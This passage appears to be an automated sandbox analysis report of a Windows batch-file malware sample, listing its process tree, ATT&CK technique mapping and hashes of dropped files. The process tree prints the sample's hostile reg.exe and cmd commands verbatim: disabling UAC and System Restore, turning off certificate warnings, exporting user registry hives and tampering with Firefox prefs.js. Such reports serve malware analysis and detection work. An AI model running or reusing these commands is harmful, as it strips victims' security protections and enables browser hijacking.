    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 00000000 /f
    3⤵
    - UAC bypass
    - System Location Discovery: System Language Discovery
    PID:1372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1708
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
      4⤵
      System Location Discovery: System Language Discovery
      PID:2976
  - - C:\Windows\SysWOW64\find.exe
      find "prefs.js"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1736
- - C:\Windows\SysWOW64\attrib.exe
    attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\prefs.js "
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1484
- - C:\Windows\SysWOW64\attrib.exe
    attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\prefs.js "
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:856
- - C:\Windows\SysWOW64\attrib.exe
    attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\prefs.js "
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:764
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe export HKU C:\Users\Admin\AppData\Local\Temp\~r.tmp
    3⤵
    - System Location Discovery: System Language Discovery
    PID:556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~r.tmp "
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2436
- - C:\Windows\SysWOW64\find.exe
    C:\Windows\system32\find.exe "Internet Explorer\Main"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c type C:\Users\Admin\AppData\Local\Temp\~i.tmp | C:\Windows\system32\find.exe "S-1-5-21"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3020
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~i.tmp "
      4⤵
      System Location Discovery: System Language Discovery
      PID:2252
  - - C:\Windows\SysWOW64\find.exe
      C:\Windows\system32\find.exe "S-1-5-21"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3032
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKU\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2080
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKU\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnOnIntranet" /t REG_DWORD /d "0x00000000" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1968
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKU\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap" /v "AutoDetect" /t REG_DWORD /d "0x00000000" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1360
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
00f80433a6bcca79188c10c6cb4f56e0

SHA1
70d5c46eb61a610cc62afb6ff03eb397673473f3

SHA256
5f7c05961532dd2a6aea3f2eb5bdc8b8b4c2f71fbf85c730ee10e2a528a0adae

SHA512
79488643b1ae12ef8629699cda685b6727ef3d4fcd0b84fe24fca6b4280f8005a5c17d90091a501811f8a3cf0a9c5d63ec1f47db0e17cf5cc024215debad47d2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
918872495080d248ec1dba8a6ca09936

SHA1
4173d22810c39ba579d0f08fd9c58d7883cad777

SHA256
6f84fd6ca2a89ac6c10339b119e21b9716bd7e8662265fff7e6eca390d67a85b

SHA512
8894eda64b0431ced1511f0b67b2701f38dd01734588cb070b5ed4a7aa0b833171d1c294cd80f0c34ecd4528f7b218cf25c672734e5ae3b699ba6bce260dda98

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
8677a41f89686619e3b19d3ee10323fa

SHA1
2f2ddd175cb876189e617a06ed36ac917d37f930

SHA256
6d439ef7a25afbe007ac7f49c9695fba47c7cf7f0ce9be121b2039f06aacbf2f

SHA512
41550517fb8e0e341ee618a9bf195d713db6f1fcf37966e00762d8a123b2d1400cdd62bbeecafe089dbc3b770c61d218aee38ecb1e0ca4a50f68454fe3b479e9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
024fc9639189737cda0da2d9173410ff

SHA1
0fb93340ba8cd16c6766fba697cd2c7b8bb6a430

SHA256
ecf7f7efe839a0b86486105a09ae3be43f93711f49c257750538579864415b54

SHA512
ac5c990910280987879ffbf8065b2a1f3bf55684c6d0a4231faedc47355f3a6c899a7350e51b220522b4f22b27af34baac6f90c767ae1e585968ec669f22b61e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a055f5a7476364f452bd71f98274a25a

SHA1
7cef98c0e7d700827ac52ba69df74fe9811cb7b6

SHA256
1095baf76cfb79a0c5498f311d20e55415c847f0eb31c2fafbefb14962a3ec42

SHA512
1ab6dc5f348826f3ba8c7d888a6aeb00e1a295c8881dc2c3eaf4e63d7aa70ea1cad4a145c6a854ce38b6669527d3a010ea26d40227f57971dfabe36c30f0fb18

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9c086b8f593af3fdaa9c5b4b916ab820

SHA1
54c1963fac0d020747cde438590342fa87b49eed

SHA256
9311750ef89f023cbb88e410bef12da66fa9f7d176f79beb42514aed8f3e5e13

SHA512
e227371232c29c68ca0ac1b6aec47e70624dd4ebf3f44655d4fcd51d53b1a9678395af433cd21d544020ca3b192b67470db25ce85827d538912a9535e173d4e6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
67e6b7148194e353f139aab4a7959a0b

SHA1
c3ea94289ccef51bb1ce471a09852362e5bc8065

SHA256
2f9517381c9229da79046dba8215e531e56875deef7aa25dd9d1ba01ace88b76

SHA512
ba91ea17ac66d5e19d02e3e646d8f2ec2de49f2d59bffec0ba1298247269c659f5ffab4a77229a94373d386f91757654a3139fcf3b018aea96324836b07a40e6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
58d90b131fb07376112f638b8e69edf1

SHA1
692911fe8f3e9aaaa44c7809c4b4a8cae6db667b

SHA256
b55c4025f8402ef3aef5a56a762898549af26b49a308621abcf981d8952b2383

SHA512
8ae82ba835b1296cd6e516c77d33ae1b428f3944e96324564d04831472210aa2e46248532e1d7958358f2e54cf74d79fd9241605fd75931a9f8139bb52ba7161

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
be3a72a3dabae407a74205be0390a358

SHA1
22451848877e9872428b9898750f7c956c500604

SHA256
e654330f7cf864679785c187c08f9cb47bf28d3a90505555a6da593cf0f7c5eb

SHA512
15643d816d9849d30ce2f1c2ebb708a21c7770e4981d9702f9911827564c7294e26d8adb58a1116a456b53b441f21e73feb92eb456d2c9cc07f62bcec18a9676

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
900ef62a2e9c01e1e6c594044564d67d

SHA1
0a24a516e132ea107fb3c1b2ae25638fcf154939

SHA256
3a0c1d60ceb1e460ee85aadb8764d84a049160f87f7038f08951d6663bee734d

SHA512
340e54a58dca1c5b2bdac859a25ea80bea8541e7dc821482147112363055c44c905230c2fff15e8f1451d3c81f82175b62a4dd47d8a89c14fbcd56ece35e83d5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e46525f6e461bc910a9aab6aa1b0082f

SHA1
286ca5c02cf1a25c4f6f23c07e87d3dd8fd7ce5d

SHA256
e7e4a94211cec349f24e724cdfe501a370b7806d6eb4a33655a49fff7ad7a0fc

SHA512
8f6cc91efeb5c9fafa847fac4e068f4c4f395811f0cc7a48dc034d654007955997d5c6be37a51f93354f22999ab4cb4baa3d7509e263be6be472295aa3bb7ffd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
fdac08c0c552ba2b0bc27f5b667669ce

SHA1
f5474536b84ab0745246951b8b7bc5e48383ba4d

SHA256
80201c399673af2e556364bb19f5e20318714b9c754c0572d9e76b616d1065fe

SHA512
f08ce3e9d7cf7085ba22d6a7b583e9fafad088296b11cca8f02519dc0cc2cf4124c891c73e01677940599561ae61d32b4fed7a0b939f06c29f257d76c9c80aaf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
6d97c07f370bdd54b62d8ddb75f753ea

SHA1
d4103d9b1b33ef4a4f354ea3424f56203d24cf9e

SHA256
55eda416d295ba77ea7b721978c8ba8309988b12c70a8794ca9724732b97b56b

SHA512
ef9f65cf778cdb117285ea3d7bb1eb319a34deb996401a338b95364560c7ed0ce4bf1f964fe8f6f1a752b90c1b524b95d61aec7d11eeef2d319af75cb4405324

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
99da0f4fe5c13b1de217757c6c5def2b

SHA1
9fd6e84340f39934306759aa69a041c9766aae0a

SHA256
f40969a2a567a98788c1c35c395949762f12a4327dadde68a33304946d2d8651

SHA512
1c5626f782b93fdead28e362b681995edb7840c8b7eee7363b36d1a561cf4c396e01197e8c2f65492d4078648e6e85c956c768276ff7fe4b9a108af81199e8fe

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
151268ac5a1f4fe2b13ec8acc162cfd3

SHA1
fcaf0ca375d7a825d587404b4e7213e954f5884a

SHA256
02e41fd58245d07d987ea3c4c0905b916f284d729963e1722c32f6637edf9ceb

SHA512
665a9cd27c360963f099c39b572f365e581976b9d8e94a91fd42921e1d0d393f40090639022e2d1abf9ace019d8fe9ff099cdefc43b3027bfcebc06b9911672e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
eb012287906e6ac7033d6108bd0edc08

SHA1
118326a499b0c2093e313f5b2686e19464df45d3

SHA256
f719cf85e1f315e8536d923218c1bc44e112c8d9c16fd18d8a698f32f9a64549

SHA512
cb43cf21a0937213f7f6f1d17f926540c54aa11735c12ca5e26edbbbd6321e59fbc887f13a18b5b5017cce923744b6f91cef59c97537b3b2eb8a2cb5189fc0a5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
263431dff208aa89679a1b31cc946451

SHA1
7c61bb7624426c970a65c9b23378a2f8d75f5e32

SHA256
1a2fd4f812dca2132d185555213e40559f8b2c5375836072d4139a102cdb2998

SHA512
f5f91034896b13464364d9f0206ce9c3951531a1b3870f948eb27535a9a9701624b544d1154f362815546b575a4946dbab982725b6fab0e8e1886a94a62cccce

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1cf76182952690ca1b764ff7d6054490

SHA1
5d34e752c413bf857d58ec2aff1d65b7d41a8e56

SHA256
f912d2f8e643ef63fac822b1d633c20734ba9dade186e6747b6b5a24080ce613

SHA512
29d985737b67163a3ec1e5e048c9d157f443ae0e8fa9da73fe4b1a940aeb047f3d4d998ea79211381265022e92a08b1dcd5c8aabe271b3f5105a35bcb3a07f3e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2891193f7607ebfc744cfdde266c3315

SHA1
15d0b13876b1b4144ecc9a70ab1242ea418f64c4

SHA256
42bfc4e433c4ba5ba22d1ba364ed4d0f1fb326bde1b982f73b2a92653a6ab903

SHA512
75d02afd323e8a8f145ea528b873c7439a3faab9c93620de0ddfdfc8727db5cb1d2ea5afe3fcdce6e3712b3fc17d30df2fa42761ffd4e4c01a17347ba966cff2

Download Submit
C:\Users\Admin\AppData\Local\Temp\A16D.tmp\Untitled.bat

Filesize
14KB

MD5
4f291149b612a318b32d3d8c0592254b

SHA1
cd2c451a43e963b575aceed5071ab50c85b2350e

SHA256
531adc8e3115b82be2cbbb0cedad352fe288454ae77c00ef8b5fc4ba591e8d14

SHA512
88719dd4c68a65489d317c546543dfbf2183ecab45f42e6dfa52604f1daed79617120bd115475924dd9309161b43b7b918fcf12e01dd24af0ed6c32a073446c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabC801.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\KB_NNYJZAHP.txt

Filesize
4KB

MD5
4a37cac0e03e7df4eff4032b62b17278

SHA1
f1eda70a1539290c9f343f2e856758c3128ceabd

SHA256
49f0e0ab641529b50fb419076c31c226da825fd29f56d7356a64b3fed7a46d3e

SHA512
127d8884b2d41e5d4a4bb70c1ca6fa3b40e995305fd4803ade7b98cbd10c2d40e1c3086b74001eabae1e9cefa8ea707ecf2e717631a15ec607eb80355ed098ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarC900.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~i.tmp

Filesize
935B

MD5
2af1ae54984c58b686ae326ba508d792

SHA1
864c000eae18a88584647cf5a81741fdf8a22f4d

SHA256
c08c7fb3d860f2edf7eea42c9d422720f1b76b32057d09e3a9aebb5361eb9874

SHA512
62c6ddf5f02523d63a7b1c3d37d300966edd9b5a425ec8755e6b144516776d62c103b45174dadd65bc178bd7111b479332567002e8cd5a1c37381d33f7ae208d

Download Submit
C:\Users\Admin\AppData\Local\Temp\~r.tmp

Filesize
3.5MB

MD5
d13af43912f032d400397da4ebe0e085

SHA1
6898f5b559a9123b0c62ff28a44d28a1641c62f3

SHA256
0fa9bb5964854d1216362d9240feae584e141436916dab1eacf81aead39f5329

SHA512
12c7b3ca5089f46bf52ba00ded39bd0cfeaed091bff16b422fcd37aa34a1390e5d056d0f56bc5cdd4b64259c28d81d0c670507fff2b8259bab6ecbfb236c0af8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\prefs.js

Filesize
6KB

MD5
f03ac85f27deebf0cd48f58a29868d7b

SHA1
e933aec0331ebb72458fd305bbeb12844e123346

SHA256
6e9e5790d52bd3b35b88861024c2cd65860f4e332eabd5af7e99d258eaf01fce

SHA512
51df6a4f8a1014cea9b17dd44c56ff95df427d1ef069e4fa9d27ffb09ea2445b2cd203d17f6b92b665126a691ea7922baf317ff19d93adcaf021b7fe3aa6ed43

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\prefs.js

Filesize
6KB

MD5
9d62abdea9ad7f1907c99d01987989b0

SHA1
4a37279428fe954aaf1ba011e72079a71984b0ab

SHA256
b23c03423b768815ab614d1bd8889ea2e6f6f88f40910f613495928e6e2afc24

SHA512
c2c633efee8ac10c3b6e8a352979669084ce81248627e41a516b417b6a3753a365905d86b6beb10376d2712cddac027183a7aeadf16db209e8574d84d928843b

Download Submit
memory/3064-0-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/3064-168-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads